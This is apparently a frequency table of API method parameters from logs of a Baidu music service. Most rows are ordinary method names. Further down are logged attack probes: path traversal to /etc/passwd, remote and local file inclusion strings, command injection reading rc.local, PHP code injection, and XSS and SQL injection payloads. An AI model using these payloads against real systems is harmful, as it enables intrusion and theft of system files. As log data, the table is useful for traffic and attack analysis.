baidu.ting.song.getInfos	61319679
baidu.ting.song.baseInfo	30792086
baidu.ting.search.lrcpic	24318986
baidu.ting.search.catalogSug	17038936
baidu.ting.user.listenAge	16863241
baidu.ting.search.common	15102022
baidu.ting.song.play	15049414
baidu.ting.song.down	8970967
baidu.ting.billboard.billList	6196968
baidu.ting.song.lry	6096493
baidu.ting.song.getInfo	5563751
baidu.ting.search.getPhotoInfos	5534439
baidu.ting.search.lrcys	5524120
baidu.ting.user.getUserBaseInfo	5403897
baidu.ting.artist.getSongList	5134084
baidu.ting.artist.getList	4677800
baidu.ting.user.checkSuggestVersion	4645763
ting.baidu.diy.getPlaylists	4370739
baidu.ting.plaza.getFocusPic	3816627
baidu.ting.user.checkComVersion	3042781
baidu.ting.game.gamedetail	2749824
baidu.ting.diy.gedanInfo	2703724
baidu.ting.plaza.getRecommendAlbum	2623731
baidu.ting.plaza.active	2518637
baidu.ting.radio.playAction	2395654
baidu.ting.artist.getInfo	1948822
baidu.ting.active.start	1871398
baidu.ting.user.config	1556717
baidu.ting.search.suggestion	1418279
baidu.ting.artist.getinfo	1288748
baidu.ting.diy.gedanHot	1240803
baidu.ting.diy.getNowOfficalList	1204920
baidu.ting.favorite.getCollectSong	1182453
baidu.ting.radio.getChannelSong	1166562
baidu.ting.album.getAlbumInfo	1105614
baidu.ting.diy.addListenCount	954999
baidu.ting.diy.category	891503
ting.baidu.plaza.recdaily	873676
baidu.ting.song.audio	833565
baidu.ting.plaza.getPartDesc	826661
baidu.ting.plaza.recdaily	806455
baidu.ting.artist.getAlbumList	721004
baidu.ting.tag.songlist	703117
baidu.ting.song.playAAC	698461
	604240
baidu.ting.tag.getHotTag	600933
baidu.ting.diy.getSongFromOfficalList	567927
baidu.ting.user.RegistToImsg	540495
baidu.ting.diy.gedan	538040
baidu.ting.user.down	522191
baidu.ting.radio.getCategoryList	446291
baidu.ting.search.lrcyss	350599
baidu.ting.search.getPhotoInfo	350439
baidu.ting.billboard.billCategory	333469
baidu.ting.feedback.song	295002
baidu.ting.diy.getPlaylists	261599
baidu.ting.artist.get72HotArtist	259988
baidu.ting.favorite.getFavoriteSong	202494
baidu.ting.song.buffer	175768
baidu.ting.plaza.recommend	172922
baidu.ting.video.getList	143594
baidu.ting.song.getMulInfos	136966
baidu.ting.game.gamelist	131479
baidu.ting.favorite.addSongFavorites	124927
baidu.ting.tag.getAllTag	107962
baidu.ting.diy.getSimilarGedan	99498
baidu.ting.diy.search	94779
baidu.ting.favorite.isCollect	84804
baidu.ting.diy.getOfficialDiyList	83565
baidu.ting.video.play	67308
baidu.ting.artist.getSpecialSongList	54715
baidu.ting.user.checkVersion	50332
baidu.ting.favorite.addSongFavorite	49634
baidu.ting.plaza.getNewSongs	48133
baidu.ting.favorite.delCollectSong	41618
ting.baidu.diy.getPlaylist	31322
baidu.ting.radio.getArtistChannelSong	26159
baidu.ting.user.nplogin	24399
baidu.ting.radio.getFavoriteSong	24061
baidu.ting.radio.serv	19812
baidu.ting.plaza.getArtistPlaza	19378
baidu.ting.diy.getPlaylist	18320
baidu.ting.artist.getHighSongTitle	14828
baidu.ting.album.getList	11791
baidu.ting.feedback.crash	11306
baidu.ting.diy.saveList	10682
ting.baidu.film.getFilmInfo	9186
baidu.ting.song.cloud	8342
baidu.ting.song.getMulInfo	7577
ting.baidu.song.lry	6613
baidu.ting.artist.getQianQianArtist	6555
baidu.ting.favorite.delSongFavorite	5920
baidu.ting.diy.addListSong	5081
baidu.ting.video.category	4940
baidu.ting.diy.delListSong	4927
baidu.ting.user.logout	4513
baidu.ting.weixin.response	4265
baidu.ting.diy.delList	4132
baidu.ting.user.regPassport	4005
baidu.ting.colorRing.listen	3847
baidu.ting.billboard.catalog	3773
baidu.ting.artist.getHighSongList	3126
baidu.ting.user.getMobileVcode	2711
baidu.ting.colorRing.getCode	2588
ting.baidu.artistapp.renum	2495
baidu.ting.colorRing.authset	2041
baidu.ting.favorite.delSongFavorites	1922
baidu.ting.favorite.getFavoriteAlbum	1611
baidu.ting.feedback.info	1559
baidu.ting.artist.getSongVote	1473
baidu.ting.artist.getSong	1391
baidu.ting.artist.getSongRank	1383
baidu.ting.diy.upList	1168
ting.baidu.artistapp.brief	807
baidu.ting.user.getMessage	738
baidu.ting.diy.addList	737
baidu.ting.diy.getRecommendSpeical	720
baidu.ting.game.catalog	644
baidu.ting.video.recMv	569
baidu.ting.user.registToUC	523
baidu.ting.colorRing.subscribe	410
baidu.ting.colorRing.toneselect	356
baidu.ting.user.activate	340
baidu.ting.artist.getInfoByName	337
baidu.ting.game.gameplay	337
baidu.ting.song.getSuoSongInfo	315
baidu.ting.artistapp.photo	195
baidu.ting.favorite.addAlbumFavorite	169
baidu.ting.favorite.getInfoFromView	159
baidu.ting.user.login	156
ting.baidu.artistapp.newList	134
baidu.ting.plaza.getMisNewSong	128
ting.baidu.artistapp.news	107
baidu.ting.song.getHash	95
baidu.ting.favorite.delAlbumFavorite	63
(	63
\' (	63
 /v8  ADw-script AD4-sslx=812812 ADw-/script AD4- nonxss	62
ting.baidu.artistapp.briefs	54
baidu.ting.favorite.getOffenListenList	49
baidu.ting.favorite.getListenHistory	46
baidu.ting.user.addPassportInfo	41
baidu.ting.mv.getIndexMV	32
baidu.ting.album.getAlbumstyle	28
http://cirt.lnet/rfiinc.txt	22
file:///etc/rc.d/rc.local_	22
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_	21
../../../../../../../../../../etc/passwd	21
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local	21
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_	21
../../../../../../../../../../etc/rc.d/rc.local	21
1\';cat /etc/rc.d/rc.local;\'	21
../../../../../../../../../../etc/rc.d/rc.local_	21
file:///etc/passwd_	21
1\\\";cat /etc/rc.d/rc.local;\\\"	21
file:///etc/rc.d/rc.local	21
c:/windows/win.ini_	21
/usr/bin/id;	21
1;cat /etc/rc.d/rc.local;	21
string:{var_dump(md5(812812))}	21
c:/windows/win.ini	21
file:///etc/passwd	21
%{	21
set	21
${	21
baidu.ting.song.playabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	21
\'];${@print(md5(812812))};//	21
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==	21
../../../../../../../../../../etc/passwd_	21
${@print(md5(812812))}	20
http://cirt.lnet/rfiinc.txt_	20
baidu.ting.song.lryabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	15
baidu.ting.song.play\';alert(1);\'	14
baidu.ting.song.lry\';alert(1);\'	10
ting.baidu.plaza.recommand	9
baidu.ting.diy.getNowOfficalList\';alert(1);\'	8
http://cirt.lnet/rfiinc.txt_.html	8
c:/windows/win.ini_.php	8
baidu.ting.song.playjavascript:alert(1)	7
baidu.ting.song.play\'>\\\';</script>>\\\"><script>alert(1)</script>\'	7
baidu.ting.song.play\'\";alert(1);//	7
baidu.ting.song.play</textarea></title><script>alert(1)</script>	7
baidu.ting.song.play\";alert(1);\"	7
baidu.ting.song.play\"><img src=1 onerror=alert(1)>	7
../../../../../../../../../../etc/rc.d/rc.local_.jpg	7
c:/windows/win.ini_.htm	7
baidu.ting.song.play--></script><script>alert(1)</script>	7
baidu.ting.song.play;alert(1);//	7
file:///etc/rc.d/rc.local_.html	7
baidu.ting.song.play\"\'><body id=ssltest title=alert(1) onload=eval(ssltest.title)>	7
baidu.ting.song.play</script><script>alert(1);//	7
baidu.ting.song.play>\'>\"><script>alert(1)</script>	7
baidu.ting.song.play\'>\"></title></textarea></script><img src=a onerror=alert(1)>	7
baidu.ting.song.play<script>confirm(1)</script>	7
baidu.ting.song.play<scrip<script>t>window.a==1?1:alert(1)</scrip</script>t>	7
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.php	7
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.htm	6
ting.baidu.video.getlist	6
file:///etc/passwd_.html	6
baidu.ting.song.play%\' and 8281=8281 and \'%\'=\'	6
../../../../../../../../../../etc/rc.d/rc.local_.html	6
baidu.ting.song.play\') and 8288=8288 and (\'	6
baidu.ting.song.play\'/**/<scr/**/ipt>/**/>	6
baidu.ting.song.play(\')\'))(\")\'\"\"\"\")	6
baidu.ting.song.play\' and \'8281\'=\'8281	6
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.php	5
baidu.ting.song.lry<scrip<script>t>window.a==1?1:alert(1)</scrip</script>t>	5
baidu.ting.song.lryjavascript:alert(1)	5
baidu.ting.song.lry\'>\\\';</script>>\\\"><script>alert(1)</script>\'	5
baidu.ting.song.lry\'\";alert(1);//	5
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.jpeg	5
file:///etc/passwd_.htm	5
baidu.ting.song.lry</textarea></title><script>alert(1)</script>	5
baidu.ting.song.lry\";alert(1);\"	5
baidu.ting.outerPassport.profile	5
baidu.ting.song.lry;alert(1);//	5
file:///etc/rc.d/rc.local_.jpg	5
baidu.ting.song.lry--></script><script>alert(1)</script>	5
baidu.ting.song.lry%\' and 8281=8281 and \'%\'=\'	5
../../../../../../../../../../etc/rc.d/rc.local_.jpeg	5
baidu.ting.song.lry</script><script>alert(1);//	5
baidu.ting.song.lry>\'>\"><script>alert(1)</script>	5
baidu.ting.song.lry<script>confirm(1)</script>	5
../../../../../../../../../../etc/passwd_.html	5
baidu.ting.song.lry\"\'><body id=ssltest title=alert(1) onload=eval(ssltest.title)>	5
../../../../../../../../../../etc/passwd_.htm	5
baidu.ting.song.lry\') and 8288=8288 and (\'	5
baidu.ting.song.lry\"><img src=1 onerror=alert(1)>	5
baidu.ting.song.lry(\')\'))(\")\'\"\"\"\")	5
baidu.ting.song.lry\' and \'8281\'=\'8281	5
baidu.ting.song.lry\'>\"></title></textarea></script><img src=a onerror=alert(1)>	5
baidu.ting.diy.getNowOfficalListabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	4
baidu.ting.diy.getNowOfficalList--></script><script>alert(1)</script>	4
baidu.ting.diy.getNowOfficalList>\'>\"><script>alert(1)</script>	4
file:///etc/passwd_.php	4
baidu.ting.diy.getNowOfficalList\"><img src=1 onerror=alert(1)>	4
baidu.ting.diy.getNowOfficalList%\' and 8281=8281 and \'%\'=\'	4
baidu.ting.diy.getNowOfficalList</textarea></title><script>alert(1)</script>	4
http://cirt.lnet/rfiinc.txt_.htm	4
baidu.ting.diy.getNowOfficalList\"\'><body id=ssltest title=alert(1) onload=eval(ssltest.title)>	4
baidu.ting.diy.getNowOfficalList(\')\'))(\")\'\"\"\"\")	4
baidu.ting.diy.getNowOfficalList\' and \'8281\'=\'8281	4
baidu.ting.diy.getNowOfficalList<script>confirm(1)</script>	4
file:///etc/rc.d/rc.local_.php	4
baidu.ting.diy.getNowOfficalList\') and 8288=8288 and (\'	4
baidu.ting.diy.getNowOfficalList\'>\"></title></textarea></script><img src=a onerror=alert(1)>	4
baidu.ting.diy.getNowOfficalList<scrip<script>t>window.a==1?1:alert(1)</scrip</script>t>	4
baidu.ting.diy.getNowOfficalList\'>\\\';</script>>\\\"><script>alert(1)</script>\'	4
baidu.ting.diy.getNowOfficalList\'\";alert(1);//	4
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.html	4
baidu.ting.diy.getNowOfficalListjavascript:alert(1)	4
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.jpeg	4
baidu.ting.diy.getNowOfficalList\";alert(1);\"	4
../../../../../../../../../../etc/passwd_.php	4
../../../../../../../../../../etc/passwd_.jpg	4
baidu.ting.diy.getNowOfficalList;alert(1);//	4
baidu.ting.diy.getNowOfficalList</script><script>alert(1);//	4
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.jpg	3
ting.baidu.song.audio	3
baidu.ting.artist.getListabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	3
file:///etc/passwd_.jpg	3
http://cirt.lnet/rfiinc.txt_.jpeg	3
baidu.ting.billboard.billListabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	3
http://cirt.lnet/rfiinc.txt_.php	3
http://cirt.lnet/rfiinc.txt_.jpg	3
file:///etc/rc.d/rc.local_.htm	3
file:///etc/passwd_.jpeg	3
c:/windows/win.ini_.jpeg	3
baidu.ting.tag.getHotTagabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	3
../../../../../../../../../../etc/passwd_.jpeg	3
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.htm	3
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.jpg	3
baidu.ting.artist.getList\';alert(1);\'	2
baidu.ting.tag.getHotTag\';alert(1);\'	2
ting.baidu.radio.playAction	2
ting.baidu.plaza.recommend	2
ting.baidu.game.gamedetail	2
http://10.42.7.217/?1383692227.34	2
http://10.42.7.217/?1383680648.38	2
http://10.42.7.217/?1383680647.96	2
http://10.42.7.217/?1383676196.51	2
http://10.42.7.217/?1383676187.75	2
http://10.42.7.217/?1383670998.47	2
http://10.42.7.217/?1383670996.34	2
http://10.42.7.217/?1383669285.17	2
http://10.42.7.217/?1383669027.44	2
http://10.42.7.217/?1383669022.48	2
http://10.42.7.217/?1383669017.97	2
http://10.42.7.217/?1383669013.62	2
http://10.42.7.217/?1383663753.97	2
http://10.42.7.217/?1383651124.08	2
http://10.42.7.217/?1383648671.46	2
http://10.42.7.217/?1383616625.88	2
ting.baidu.artistapp.send	2
http://10.42.7.217/?1383676222.9	2
http://10.42.7.217/?1383676191.4	2
http://10.42.7.217/?1383671026.9	2
file:///etc/rc.d/rc.local_.jpeg	2
c:/windows/win.ini_.html	2
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.html	2
